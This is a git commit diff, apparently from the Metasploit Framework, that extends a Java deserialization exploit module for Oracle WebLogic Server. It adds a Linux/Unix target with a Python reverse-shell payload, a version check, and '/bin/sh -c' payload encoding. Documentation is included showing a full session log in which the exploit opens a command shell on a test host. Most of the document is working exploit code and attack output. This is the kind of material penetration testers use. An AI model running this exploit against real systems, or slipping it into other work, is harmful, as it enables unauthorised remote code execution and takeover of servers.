Land #10540, weblogic_deserialize, add check method and linux target
commit
9d3e1c1942
|
@ -45,3 +45,39 @@ Logged On Users : 2
|
|||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29
|
||||
```
|
||||
msf5 > use exploit/windows/misc/weblogic_deserialize
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set rhosts 172.22.222.205
|
||||
rhosts => 172.22.222.205
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set lhost 172.22.222.197
|
||||
lhost => 172.22.222.197
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set srvhost 172.22.222.197
|
||||
srvhost => 172.22.222.197
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > check
|
||||
|
||||
[+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0
|
||||
[*] 172.22.222.205:7001 The target appears to be vulnerable.
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > run
|
||||
[*] Exploit running as background job 2.
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) >
|
||||
[*] Started reverse TCP handler on 172.22.222.197:4444
|
||||
[*] 172.22.222.205:7001 - Sending handshake...
|
||||
[*] 172.22.222.205:7001 - Sending client object payload...
|
||||
[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
|
||||
[*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205
|
||||
[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
|
||||
[*] Command shell session 1 opened (172.22.222.197:4444 -> 172.22.222.205:35904) at 2018-08-28 10:59:20 -0500
|
||||
[*] 172.22.222.205:7001 - Server stopped.
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) >
|
||||
sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
whoami
|
||||
msfdev
|
||||
uname -a
|
||||
Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
|
@ -34,10 +34,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => ['win']
|
||||
[ 'Unix',
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
|
||||
'Payload' => {
|
||||
'Encoder' => 'cmd/ifs',
|
||||
'BadChars' => ' ',
|
||||
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
|
||||
}
|
||||
],
|
||||
[ 'Windows',
|
||||
'Platform' => 'win',
|
||||
'Payload' => {},
|
||||
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -48,10 +58,47 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Apr 17 2018'))
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
|
||||
req << "Host: #{peer}\n\n"
|
||||
sock.put(req)
|
||||
|
||||
res = sock.get_once
|
||||
disconnect
|
||||
return CheckCode::Unknown unless res
|
||||
|
||||
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
|
||||
if version
|
||||
version = Gem::Version.new(version)
|
||||
vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
|
||||
|
||||
case
|
||||
when version.to_s.start_with?('10.3')
|
||||
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
|
||||
when version.to_s.start_with?('12.1')
|
||||
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
|
||||
when version.to_s.start_with?('12.2')
|
||||
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')
|
||||
end
|
||||
end
|
||||
|
||||
if res.include?('Oracle WebLogic Server Administration Console')
|
||||
return CheckCode::Detected
|
||||
end
|
||||
|
||||
CheckCode::Unknown
|
||||
end
|
||||
|
||||
def gen_resp
|
||||
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
||||
pwrshl.gsub!("%COMSPEC%", "cmd.exe")
|
||||
if target.name == 'Windows'
|
||||
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
|
||||
tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
|
||||
else
|
||||
nix_cmd = payload.encoded
|
||||
nix_cmd.prepend('/bin/sh -c ')
|
||||
tmp_dat = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
|
||||
end
|
||||
|
||||
mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
|
||||
mycmd << tmp_dat
|
||||
|
@ -140,7 +187,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
@resp << '7e005a'
|
||||
end
|
||||
|
||||
|
||||
def on_client_connect(client)
|
||||
# Make sure to only sent one meterpreter payload to a host.
|
||||
# During testing the remote host called back up to 11 times
|
||||
|
@ -149,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if @met_sent.include?(client.peerhost) then return end
|
||||
@met_sent << client.peerhost
|
||||
|
||||
vprint_status("met_sent: #{@met_sent}")
|
||||
vprint_status("Sending payload to client: #{client.peerhost}")
|
||||
|
||||
# Response format determined by watching network traffic
|
||||
# generated by EDB PoC
|
||||
|
@ -304,7 +350,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
start_service
|
||||
|
||||
vprint_status('Sending payload...')
|
||||
print_status('Sending client object payload...')
|
||||
send_payload_objdata
|
||||
|
||||
# Need to wait this long to make sure we get a shell back
|
Loading…
Reference in New Issue